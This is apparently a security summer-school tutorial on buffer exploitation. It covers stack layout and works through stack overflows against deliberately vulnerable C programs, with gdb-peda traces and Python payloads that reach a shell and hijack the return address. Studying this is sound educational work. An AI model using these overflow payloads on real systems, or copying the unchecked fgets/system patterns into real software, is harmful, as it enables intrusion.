====== 0x05. Buffer Exploitation ======
===== Resources =====
[[https://security.cs.pub.ro/summer-school/res/slides/06-buffer-management.pdf|Session 5 slides]]
[[https://security.cs.pub.ro/summer-school/res/arc/06-buffer-management-skel.zip|Session's tutorials and challenges archive]]
[[https://security.cs.pub.ro/summer-school/res/arc/06-buffer-management-snippets.zip|Session's code snippets]].
/*[[https://security.cs.pub.ro/summer-school/res/arc/06-buffer-management-full.zip|Session's solutions]]*/
===== Tutorials =====
==== Buffers ====
A buffer is an area of contiguous data in memory, determined by a starting address, contents and length. Understanding how buffers are used (or misused) is vital for both offensive and defensive purposes.
In C, we can declare a buffer of bytes as a char array, as follows:
char local_buffer[32];
Which results in the following assembly code:
080483db :
80483db: 55 push ebp
80483dc: 89 e5 mov ebp,esp
80483de: 83 ec 20 sub esp,0x20
80483e1: b8 00 00 00 00 mov eax,0x0
80483e6: c9 leave
80483e7: c3 ret
Notice that buffer allocation is done by simply subtracting its intended size from the current stack pointer (''sub esp, 0x20''). This reserves space on the stack (remember that on x86 the stack grows "downwards", from higher addresses to lower ones).
A compiler may allocate more space on the stack than explicitly required. For example, on a 64-bit machine with stack canaries enabled (an additional 64-bit value is implicitly placed between buffers and the return address; more on that in future sessions), declaring either ''char s[32]'' or ''char s[40]'' might yield ''sub rsp, 0x30'' to keep buffers aligned at 16-byte boundaries.
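A rough way to reason about such sizes is to round the space needed up to the next multiple of the alignment. The sketch below assumes an 8-byte canary and 16-byte alignment, as in the 64-bit example above; the helper name ''frame_size'' is made up for illustration, and real compilers are free to pad differently.

```python
def frame_size(buffer_len, canary_len=8, alignment=16):
    """Round buffer + canary up to the next multiple of `alignment`.

    Assumption: this only mirrors the 64-bit example in the text;
    an actual compiler may reserve more (or less) space.
    """
    needed = buffer_len + canary_len
    return (needed + alignment - 1) // alignment * alignment


for n in (32, 40):
    print("char s[%d] -> sub rsp, %#x" % (n, frame_size(n)))
```

Both declarations end up with the same reservation under these assumptions, which is why the disassembly, not the C source, is the reference when computing offsets.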
To exploit a program, the C source code may not be a good enough reference point. Only disassembling the executable will provide relevant information.
Buffers can also be stored in other places in memory, such as the ''heap'', ''.bss'' or ''.rodata''.
You can find the following code snippet [[https://security.cs.pub.ro/summer-school/res/arc/06-buffer-management-snippets.zip|here]] (''buffers/buffers.c'').
#include <stdio.h>
#include <stdlib.h>
char g_buf_init_zero[32] = {0};
/* g_buf_init_vals[5..31] will be 0 */
char g_buf_init_vals[32] = {1, 2, 3, 4, 5};
const char g_buf_const[32] = "Hello, world\n";
int main(void)
{
char l_buf[32];
static char s_l_buf[32];
char *heap_buf = malloc(32);
free(heap_buf);
return 0;
}
Let's have a look at the executable sections:
$ readelf -S buffers
[Nr] Name Type Addr Off Size ES Flg Lk Inf Al
...
[16] .rodata PROGBITS 080485a0 0005a0 000040 00 A 0 0 32
...
[24] .data PROGBITS 0804a020 001020 000040 00 WA 0 0 32
[25] .bss NOBITS 0804a060 001060 000060 00 WA 0 0 32
...
Key to Flags:
W (write)
A (alloc)
And the address of each symbol (buffer in this case), as listed by ''nm'':
080485c0 R g_buf_const
0804a040 D g_buf_init_vals
0804a080 B g_buf_init_zero
0804a0a0 b s_l_buf.2387
Key to Flags:
R (symbol is read-only)
D (symbol in initialized data section)
B (symbol in BSS data section)
Uppercase and lowercase flags refer to the same kind of section.
A lowercase flag means the symbol is local (not visible outside the module).
Alternatively, you can use gdb to extract information on each symbol:
gdb-peda$ p &g_buf_const
$1 = ( *) 0x80485c0
Using this information you can map each symbol to a data section.
For example, the address of g_buf_const is ''0x80485c0'', so it is placed
in the .rodata section ''addr=0x080485a0; size=0x40''.
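The same mapping can be done mechanically. The sketch below copies the section ranges and symbol addresses from the listings above into two tables and checks which section each address falls into; the helper name ''section_of'' is an assumption made for this example.

```python
# Section table copied from the readelf output above: name -> (start, size).
SECTIONS = {
    ".rodata": (0x080485a0, 0x40),
    ".data":   (0x0804a020, 0x40),
    ".bss":    (0x0804a060, 0x60),
}

# Symbol addresses copied from the symbol listing above.
SYMBOLS = {
    "g_buf_const":     0x080485c0,
    "g_buf_init_vals": 0x0804a040,
    "g_buf_init_zero": 0x0804a080,
    "s_l_buf":         0x0804a0a0,
}


def section_of(addr):
    """Return the name of the section containing addr, or None."""
    for name, (start, size) in SECTIONS.items():
        if start <= addr < start + size:
            return name
    return None


for sym, addr in SYMBOLS.items():
    print("%-16s %#010x -> %s" % (sym, addr, section_of(addr)))
```

Note that ''g_buf_init_zero'' lands in ''.bss'' even though it has an explicit initializer: a buffer initialized only with zeros does not need to occupy space in the file.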
Non-static local variables and dynamically allocated buffers cannot be
seen in the executable (they have meaning only at runtime, because they are
allocated on the stack or heap when the code reaches a certain point). Let's
inspect the execution right before calling free() and see where the heap
buffer will be placed:
gdb-peda$
[----------------------------------registers-----------------------------------]
EAX: 0x804b160 --> 0x0
EBX: 0x0
ECX: 0x21e79
EDX: 0x804b160 --> 0x0
ESI: 0xf7fb4000 --> 0x1d4d6c
EDI: 0x0
EBP: 0xffffd798 --> 0x0
ESP: 0xffffd750 --> 0x804b160 --> 0x0
EIP: 0x80484e8 (: call 0x8048350 )
EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x80484df : mov DWORD PTR [ebp-0x30],eax
0x80484e2 : sub esp,0xc
0x80484e5 : push DWORD PTR [ebp-0x30]
=> 0x80484e8 : call 0x8048350
0x80484ed : add esp,0x10
0x80484f0 : mov eax,0x0
0x80484f5 : mov edx,DWORD PTR [ebp-0xc]
0x80484f8 : xor edx,DWORD PTR gs:0x14
Guessed arguments:
arg[0]: 0x804b160 --> 0x0
[------------------------------------stack-------------------------------------]
0000| 0xffffd750 --> 0x804b160 --> 0x0
0004| 0xffffd754 --> 0xffffd9e0 ("examples/buffers")
0008| 0xffffd758 --> 0xf7e0f049 (add ebx,0x1a4fb7)
0012| 0xffffd75c --> 0xf7fb7748 --> 0x0
0016| 0xffffd760 --> 0xf7fb4000 --> 0x1d4d6c
0020| 0xffffd764 --> 0xf7fb4000 --> 0x1d4d6c
0024| 0xffffd768 --> 0x804b160 --> 0x0
0028| 0xffffd76c --> 0xf7e0f1ab (add esp,0x10)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
gdb-peda$ x/wx $ebp-0x30
0xffffd768: 0x0804b160
gdb-peda$ vmm
Start End Perm Name
...
0x0804b000 0x0806d000 rw-p [heap]
...
The gdb-peda ''vmm'' command displays the virtual memory map of the process;
this can be used to easily inspect the addresses and permissions of each memory region.
You can find the following code snippet [[https://security.cs.pub.ro/summer-school/res/arc/06-buffer-management-snippets.zip|here]] (''init_buffer/init_buffer.c'').
Let's fill our stack buffer with some values and disassemble the binary:
char local_buffer[32];
unsigned int i = 0;
for (i = 0; i < 32; i++) {
local_buffer[i] = i;
}
080483db :
80483db: 55 push ebp
80483dc: 89 e5 mov ebp,esp
80483de: 83 ec 24 sub esp,0x24 ; reserve space for both the local_buffer (0x20) and i (0x4)
80483e1: c7 45 fc 00 00 00 00 mov DWORD PTR [ebp-0x4],0x0 ; initialize i
80483e8: c7 45 fc 00 00 00 00 mov DWORD PTR [ebp-0x4],0x0 ; redundant unoptimized compiler logic
80483ef: eb 13 jmp 8048404 ; goto the end of loop
80483f1: 8b 45 fc mov eax,DWORD PTR [ebp-0x4] ; get value of 'i' in eax
80483f4: 89 c1 mov ecx,eax ; save 'i' in ecx
80483f6: 8d 55 dc lea edx,[ebp-0x24] ; load the address of 'local_buffer' in edx
80483f9: 8b 45 fc mov eax,DWORD PTR [ebp-0x4] ; get 'i'
80483fc: 01 d0 add eax,edx ; compute address of 'local_buffer+i' in eax
80483fe: 88 08 mov BYTE PTR [eax],cl ; store 'i' at *(local_buffer+i)
8048400: 83 45 fc 01 add DWORD PTR [ebp-0x4],0x1 ; increment 'i'
8048404: 83 7d fc 1f cmp DWORD PTR [ebp-0x4],0x1f ; compare 'i' with 31
8048408: 76 e7 jbe 80483f1 ; continue loop if below or equal or fall through if above
804840a: b8 00 00 00 00 mov eax,0x0
804840f: c9 leave
8048410: c3 ret
Notice that now we subtract ''0x24'' from the stack pointer, since this time we also need to reserve space for the ''unsigned integer'' used as an index.
Similar to how arguments are referenced using ''ebp'', so are the local variables. Since in most cases the value of ''ebp'' stays fixed throughout the execution of a function, you can easily track local variables and buffers by mapping names to offsets (i.e. 'i' to '-0x4', 'local_buffer' to '-0x24' and so on). Intermediary positions within the buffer are almost always computed by using the base address and adding an offset to it.
Values at offsets relative to ''ebp'' have their meaning defined by their use, instead of static names. This implies that even if the allocated space is 0x24, the compiler may
reorder local buffers, and space may be interpreted as either 'i' at 'ebp-0x4' and 'local_buffer' at 'ebp-0x24', or 'i' at 'ebp-0x24' and 'local_buffer' at 'ebp-0x20'.
Finally, let's add one more interesting change to our code:
char local_buffer2[30];
char local_buffer[2];
unsigned int i = 0;
for (i = 0; i < 32; i++) {
local_buffer[i] = i;
}
Can you guess what the resulting code will look like when disassembled? Where are we writing to?
==== Stack buffer overflows ====
As we have seen in previous sessions, the stack serves multiple purposes:
* Passing function arguments from the caller to the callee
* Storing local variables for functions
* Temporarily saving register values before a call
* Saving the return address and old frame pointer
Our previous example shows that although buffers are conceptually separate from one another, they are ultimately just regions of memory with no intrinsic identity or associated size. Some higher-level languages make it impossible to write beyond the bounds of a container precisely because the size is integrated into the object itself and checked on access.
But in our case, bounds are unchecked, therefore it is up to the programmer to code carefully. This includes checking for any overflows and using **safe functions**. Unfortunately, many functions in the standard C library, particularly those which work with strings and read user input, are unsafe - nowadays, the compiler will issue warnings when encountering them.
What can happen in the event that we write outside the bounds of a stack buffer?
You can find the following code snippet [[https://security.cs.pub.ro/summer-school/res/arc/06-buffer-management-snippets.zip|here]] (''buffer_overflow/buffer_overflow.c'').
void f(char *buf)
{
unsigned int i = 0;
for (i = 0; i < 100; i++) {
buf[i] = i;
}
}
int main(int argc, char* argv[])
{
char local_buffer[32];
f(local_buffer);
return 0;
}
$ ./buffer_overflow
Segmentation fault (core dumped)
What happened? Let's try to find the cause starting with the call of ''f'':
gdb-peda$ b *0x08048430
Breakpoint 1 at 0x8048430
gdb-peda$ r
[----------------------------------registers-----------------------------------]
EAX: 0xffffd638 --> 0xffffd6fc --> 0xffffd8ff ("XDG_CONFIG_DIRS=/etc/xdg/xdg-ubuntu:/etc/xdg")
EBX: 0x0
ECX: 0x38f575fd
EDX: 0xffffd684 --> 0x0
ESI: 0xf7fb4000 --> 0x1d4d6c
EDI: 0x0
EBP: 0xffffd658 --> 0x0
ESP: 0xffffd634 --> 0xffffd638 --> 0xffffd6fc --> 0xffffd8ff ("XDG_CONFIG_DIRS=/etc/xdg/xdg-ubuntu:/etc/xdg")
EIP: 0x8048430 (: call 0x80483f6 )
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x8048429 : sub esp,0x20
0x804842c : lea eax,[ebp-0x20]
0x804842f : push eax
=> 0x8048430 : call 0x80483f6
0x8048435 : add esp,0x4
0x8048438 : mov eax,0x0
0x804843d : leave
0x804843e : ret
Guessed arguments:
arg[0]: 0xffffd638 --> 0xffffd6fc --> 0xffffd8ff ("XDG_CONFIG_DIRS=/etc/xdg/xdg-ubuntu:/etc/xdg")
arg[1]: 0xffffd6fc --> 0xffffd8ff ("XDG_CONFIG_DIRS=/etc/xdg/xdg-ubuntu:/etc/xdg")
[------------------------------------stack-------------------------------------]
0000| 0xffffd634 --> 0xffffd638 --> 0xffffd6fc --> 0xffffd8ff ("XDG_CONFIG_DIRS=/etc/xdg/xdg-ubuntu:/etc/xdg")
0004| 0xffffd638 --> 0xffffd6fc --> 0xffffd8ff ("XDG_CONFIG_DIRS=/etc/xdg/xdg-ubuntu:/etc/xdg")
0008| 0xffffd63c --> 0x8048461 (<__libc_csu_init+33>: lea eax,[ebx-0xf4])
0012| 0xffffd640 --> 0xf7fe59b0 (push ebp)
0016| 0xffffd644 --> 0x0
0020| 0xffffd648 --> 0x8048449 (<__libc_csu_init+9>: add ebx,0x1bb7)
0024| 0xffffd64c --> 0x0
0028| 0xffffd650 --> 0xf7fb4000 --> 0x1d4d6c
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Breakpoint 1, 0x08048430 in main ()
gdb-peda$ ni
[----------------------------------registers-----------------------------------]
EAX: 0xffffd69b --> 0x63 ('c')
EBX: 0x0
ECX: 0x38f575fd
EDX: 0x63 ('c')
ESI: 0xf7fb4000 --> 0x1d4d6c
EDI: 0x0
EBP: 0xffffd658 (" !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
ESP: 0xffffd634 --> 0xffffd638 --> 0x3020100
EIP: 0x8048435 (: add esp,0x4)
EFLAGS: 0x202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x804842c : lea eax,[ebp-0x20]
0x804842f : push eax
0x8048430 : call 0x80483f6
=> 0x8048435 : add esp,0x4
0x8048438 : mov eax,0x0
0x804843d : leave
0x804843e : ret
0x804843f: nop
[------------------------------------stack-------------------------------------]
0000| 0xffffd634 --> 0xffffd638 --> 0x3020100
0004| 0xffffd638 --> 0x3020100
0008| 0xffffd63c --> 0x7060504
0012| 0xffffd640 --> 0xb0a0908
0016| 0xffffd644 --> 0xf0e0d0c
0020| 0xffffd648 --> 0x13121110
0024| 0xffffd64c --> 0x17161514
0028| 0xffffd650 --> 0x1b1a1918
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x08048435 in main ()
gdb-peda$ b *0x0804843e
Breakpoint 2 at 0x0804843e
gdb-peda$ c
Continuing.
[----------------------------------registers-----------------------------------]
EAX: 0x0
EBX: 0x0
ECX: 0x38f575fd
EDX: 0x63 ('c')
ESI: 0xf7fb4000 --> 0x1d4d6c
EDI: 0x0
EBP: 0x23222120 (' !"#')
ESP: 0xffffd65c ("$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
EIP: 0x804843e (: ret)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x8048435 : add esp,0x4
0x8048438 : mov eax,0x0
0x804843d : leave
=> 0x804843e : ret
0x804843f: nop
0x8048440 <__libc_csu_init>: push ebp
0x8048441 <__libc_csu_init+1>: push edi
0x8048442 <__libc_csu_init+2>: push esi
[------------------------------------stack-------------------------------------]
0000| 0xffffd65c ("$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
0004| 0xffffd660 ("()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
0008| 0xffffd664 (",-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
0012| 0xffffd668 ("0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
0016| 0xffffd66c ("456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
0020| 0xffffd670 ("89:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
0024| 0xffffd674 ("<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
0028| 0xffffd678 ("@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Breakpoint 2, 0x0804843e in main ()
gdb-peda$ ni
[----------------------------------registers-----------------------------------]
EAX: 0x0
EBX: 0x0
ECX: 0x38f575fd
EDX: 0x63 ('c')
ESI: 0xf7fb4000 --> 0x1d4d6c
EDI: 0x0
EBP: 0x23222120 (' !"#')
ESP: 0xffffd660 ("()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
EIP: 0x27262524 ("$%&'")
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x27262524
[------------------------------------stack-------------------------------------]
0000| 0xffffd660 ("()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
0004| 0xffffd664 (",-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
0008| 0xffffd668 ("0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
0012| 0xffffd66c ("456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
0016| 0xffffd670 ("89:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
0020| 0xffffd674 ("<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
0024| 0xffffd678 ("@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
0028| 0xffffd67c ("DEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x27262524 in ?? ()
It seems that the return address of ''main'', along with a lot more of the stack, gets overwritten with the characters that we write "in the buffer". The program then tries to "return to $%&'" ($%&' is the ASCII representation of little endian 0x27262524), which is an unmapped address. This ultimately triggers a page fault, upon which the operating system signals a ''SIGSEGV'' and terminates the process.
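The values seen in the registers can be reproduced with a toy model of ''main'''s stack frame. The sketch below assumes the layout suggested by the disassembly (''local_buffer'' at ''ebp-0x20'', saved ''ebp'' at ''ebp'', return address at ''ebp+4'') and uses a plain byte array in place of real memory.

```python
import struct

FRAME = bytearray(0x80)   # toy model of the stack around main's frame
EBP = 0x20                # index of the saved ebp inside FRAME
BUF = EBP - 0x20          # local_buffer lives at ebp-0x20
RET = EBP + 4             # saved return address sits right above saved ebp

# Same loop as f(): buf[i] = i for 100 iterations, with no bounds check.
for i in range(100):
    FRAME[BUF + i] = i

# Read both 32-bit slots back as little-endian integers.
saved_ebp = struct.unpack_from("<I", FRAME, EBP)[0]
ret_addr = struct.unpack_from("<I", FRAME, RET)[0]
print(hex(saved_ebp), hex(ret_addr))
```

In this model the two slots hold the same values that gdb reports for ''EBP'' after ''leave'' and for ''EIP'' after ''ret''. Since each byte written equals its own index, the lowest byte of the bogus return address (''0x24'') is also the offset of the return address from the start of the buffer.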
A buffer overflow is an anomaly caused by writing beyond the bounds of a buffer; it is not necessarily a vulnerability. The presence of a buffer overflow can lead to strange behavior, a crash, arbitrary code execution or absolutely **nothing**.
==== Diverting code execution ====
We attempted to use the wonderful ''gets'' function, but the compiler does not generate it and the man page explicitly says:
DESCRIPTION
Never use this function.
gets() reads a line from stdin into the buffer pointed to by s until either a terminating newline or EOF, which it replaces with a
null byte ('\0'). No check for buffer overrun is performed (see BUGS below).
However, we can still handcraft our own vulnerable scenario. Let's try to divert the code execution by using a buffer overflow vulnerability.
You can find the following code snippet [[https://security.cs.pub.ro/summer-school/res/arc/06-buffer-management-snippets.zip|here]] (''buffer_overflow_var/buffer_overflow_var.c'').
#include <stdio.h>
#include <stdlib.h>
void f(char* buf) {
fgets(buf, 100, stdin);
}
int main(int argc, char* argv[])
{
int critical_variable = 0;
char local_buffer[32];
f(local_buffer);
if (critical_variable == 1337) {
printf("Oh dear, you shouldn't be here!\n");
system("/bin/sh");
}
return 0;
}
Our ''local_buffer'' is dangerously close to that critical variable. Let's see if we can overwrite it. We need 32 bytes of input to fill our buffer + 4 bytes for the integer.
$ python -c "print('A'*32 + '1337')" | ./buffer_overflow_var
Nothing happened. Let's find out why. We'll save our payload to a file and run ''buffer_overflow_var'' under gdb, using the file as input:
$ python -c "print('A'*32 + '1337')" > payload
$ gdb ./buffer_overflow_var
gdb-peda$ b *0x80484fc
Breakpoint 1 at 0x80484fc
gdb-peda$ r < payload
Starting program: ./buffer_overflow_var < payload
[----------------------------------registers-----------------------------------]
EAX: 0xffffd5dc ('A' , "1337\n")
EBX: 0x0
ECX: 0xf7fb589c --> 0x0
EDX: 0xffffd5dc ('A' , "1337\n")
ESI: 0xf7fb4000 --> 0x1d4d6c
EDI: 0x0
EBP: 0xffffd608 --> 0x0
ESP: 0xffffd5d0 --> 0xf7fb4000 --> 0x1d4d6c
EIP: 0x80484fc (: cmp DWORD PTR [ebp-0xc],0x539)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x80484f3 : push eax
0x80484f4 : call 0x80484b6
0x80484f9 : add esp,0x10
=> 0x80484fc : cmp DWORD PTR [ebp-0xc],0x539
0x8048503 : jne 0x8048525
0x8048505 : sub esp,0xc
0x8048508 : push 0x80485c0
0x804850d : call 0x8048360
[------------------------------------stack-------------------------------------]
0000| 0xffffd5d0 --> 0xf7fb4000 --> 0x1d4d6c
0004| 0xffffd5d4 --> 0xf7fb4000 --> 0x1d4d6c
0008| 0xffffd5d8 --> 0x0
0012| 0xffffd5dc ('A' , "1337\n")
0016| 0xffffd5e0 ('A' , "1337\n")
0020| 0xffffd5e4 ('A' , "1337\n")
0024| 0xffffd5e8 ('A' , "1337\n")
0028| 0xffffd5ec ('A' , "1337\n")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Breakpoint 1, 0x080484fc in main ()
gdb-peda$ x/wx $ebp-0xc
0xffffd5fc: 0x37333331
gdb-peda$ x/s $ebp-0xc
0xffffd5fc: "1337\n"
We usually use high level scripting languages, such as **python** to craft payloads. For example, to generate 32 ''A''s, we just use '''A'*32''.
We can observe two things:
* We actually wrote the __string__ ''1337'', which is ''0x37333331'', instead of the actual value ''1337'' or ''0x539'' in hex.
* We missed the fact that x86 is Little Endian, meaning that we should write the integer value into memory starting with the least significant byte first.
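Both observations can be checked quickly with Python's ''struct'' module. This is only an illustration of the byte layouts involved, not part of the original snippets.

```python
import struct

as_text = b"1337"                  # what the first payload actually sent
as_int = struct.pack("<I", 1337)   # the 32-bit integer 1337, little endian

# The four ASCII characters, read back as a little-endian integer.
print(hex(struct.unpack("<I", as_text)[0]))
# The bytes that must be in memory for the comparison with 0x539 to succeed.
print(as_int)
```

The first value is what gdb showed at ''ebp-0xc''; the second is the byte sequence the program needs to find there.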
An easy way to overcome this is to write a small script which will generate the required payload for us, as follows:
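#!/usr/bin/env python
import struct
buflen = 32
payload = b'A' * buflen
payload += struct.pack('<I', 1337)  # 1337 as a little-endian 32-bit integer
# write the raw bytes, newline-terminated so that fgets() returns
with open('payload', 'wb') as f:
    f.write(payload + b'\n')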
Note the use of ''struct.pack'' and ''struct.unpack'' when working with binary data that needs to be stored in various configurations.
Let's test our new payload:
$ cat payload | ./buffer_overflow_var
Oh dear, you shouldn't be here!
It seems to alter the code flow as we wanted, but it doesn't seem to spawn a (new) shell. What gives? The gist of the issue is that the binary reads from ''stdin'' in one "chomp". Our newly spawned shell has no input left to read and exits before we get a chance to enter any commands (similar to how the shell behaves when you send ''Ctrl-D'', i.e. ''end of input''). We can use the following clever trick to keep ''stdin'' open for further user interaction:
$ cat payload - | ./buffer_overflow_var
Oh dear, you shouldn't be here!
date
Tue Jun 27 22:17:48 EEST 2017
whoami
root
We used the ''cat filename - | ./binary'' trick to concatenate the contents of ''filename'' with the ''standard input''. Once the end of the file is reached, ''cat'' keeps forwarding whatever you type on standard input to the binary.
==== Overwriting the stored return address ====
Let's wrap up our stack smashing adventure by changing the code flow through overwriting the return address stored on the stack.
You can find the following code snippet [[https://security.cs.pub.ro/summer-school/res/arc/06-buffer-management-snippets.zip|here]] (''buffer_overflow_ret/buffer_overflow_ret.c'').
#include
void win()
{
printf("Well done!\n");
}
void f()
{
printf("Nothing to see here\n");
}
void get_message(char *buf)
{
fgets(buf, 100, stdin);
}
int main(int argc, char* argv[])
{
char local_buffer[32];
printf("Please leave a message: ");
get_message(local_buffer);
f();
return 0;
}
First, let's trigger the program to crash like in the previous example:
$ ./buffer_overflow_ret
Please leave a message: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Nothing to see here
Segmentation fault (core dumped)
However, we do not know at which point relative to the start of our buffer the saved return address gets overwritten. We can either compute it by looking at the disassembly and the stack layout or by using a De Bruijn pattern in PEDA. Such a pattern contains unique groups of 4 characters, meaning that each group will have a unique offset within the pattern.
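To see why such a pattern pinpoints the offset, here is a minimal sketch that builds a De Bruijn sequence with the textbook recursive algorithm and looks up a 4-byte group in it. It does not reproduce PEDA's exact pattern; the alphabet and the helper names ''pattern_create'' and ''pattern_offset'' are assumptions made for this example.

```python
import struct


def de_bruijn(alphabet, n):
    """Return a De Bruijn sequence: every length-n string over
    `alphabet` appears exactly once (cyclically)."""
    k = len(alphabet)
    a = [0] * (k * n)
    out = []

    def db(t, p):
        if t > n:
            if n % p == 0:
                out.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return "".join(alphabet[i] for i in out)


def pattern_create(length, alphabet="abcdefghij", n=4):
    """First `length` characters of the sequence; 4-byte groups stay unique."""
    return de_bruijn(alphabet, n)[:length]


def pattern_offset(pattern, eip):
    """Find where the 4 bytes that ended up in eip sit in the pattern."""
    chunk = struct.pack("<I", eip).decode("ascii")
    return pattern.find(chunk)


pattern = pattern_create(100)
# Pretend the bytes at offset 40 were loaded into eip by `ret`.
fake_eip = struct.unpack("<I", pattern[40:44].encode("ascii"))[0]
print(pattern_offset(pattern, fake_eip))
```

PEDA wraps the same idea in its ''pattc'' and ''patto'' commands, used in the session that follows.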
$ gdb ./buffer_overflow_ret
gdb-peda$ pattc 100
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL'
gdb-peda$ r
Starting program: ./buffer_overflow_ret
Please leave a message: AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALL
Nothing to see here
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x0
EBX: 0x0
ECX: 0x804b160 ("Nothing to see here\nge: ")
EDX: 0xf7fb5890 --> 0x0
ESI: 0xf7fb4000 --> 0x1d4d6c
EDI: 0x0
EBP: 0x61414145 ('EAAa')
ESP: 0xffffd620 ("AFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AA")
EIP: 0x41304141 ('AA0A')
EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x41304141
[------------------------------------stack-------------------------------------]
0000| 0xffffd620 ("AFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AA")
0004| 0xffffd624 ("bAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AA")
0008| 0xffffd628 ("AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AA")
0012| 0xffffd62c ("AcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AA")
0016| 0xffffd630 ("2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AA")
0020| 0xffffd634 ("AAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AA")
0024| 0xffffd638 ("A3AAIAAeAA4AAJAAfAA5AAKAAgAA6AA")
0028| 0xffffd63c ("IAAeAA4AAJAAfAA5AAKAAgAA6AA")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x41304141 in ?? ()
gdb-peda$ patto AA0A
AA0A found at offset: 40
This tells us that we need to write 40 characters into the buffer and then the next 4 bytes will overwrite the return address. Let's test this, again, by writing a script that can generate a payload, which we can easily tailor to our needs. First, let's see if we can reliably change the value of the return address. We'll attempt to write ''0xdeadbeef'' first.
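#!/usr/bin/env python
import struct
payload = b'A' * 36
payload += struct.pack('<I', 0x61616161)  # overwrites the saved ebp ('aaaa')
payload += struct.pack('<I', 0xdeadbeef)  # overwrites the return address
with open('payload', 'wb') as f:
    f.write(payload)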
gdb-peda$ r < payload
Starting program: ./buffer_overflow_ret < payload
Please leave a message: Nothing to see here
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x0
EBX: 0x0
ECX: 0x804b160 ("Please leave a message: Nothing to see here\n")
EDX: 0xf7fb5890 --> 0x0
ESI: 0xf7fb4000 --> 0x1d4d6c
EDI: 0x0
EBP: 0x61616161 ('aaaa')
ESP: 0xffffd620 --> 0x0
EIP: 0xdeadbeef
EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0xdeadbeef
[------------------------------------stack-------------------------------------]
0000| 0xffffd620 --> 0x0
0004| 0xffffd624 --> 0xffffd6b4 --> 0xffffd859 ("./buffer_overflow_ret")
0008| 0xffffd628 --> 0xffffd6bc --> 0xffffd8cb ("XDG_CONFIG_DIRS=/etc/xdg/xdg-ubuntu:/etc/xdg")
0012| 0xffffd62c --> 0xffffd644 --> 0x0
0016| 0xffffd630 --> 0x1
0020| 0xffffd634 --> 0x0
0024| 0xffffd638 --> 0xf7fb4000 --> 0x1d4d6c
0028| 0xffffd63c --> 0xf7fe575a (add edi,0x178a6)
[------------------------------------------------------------------------------]
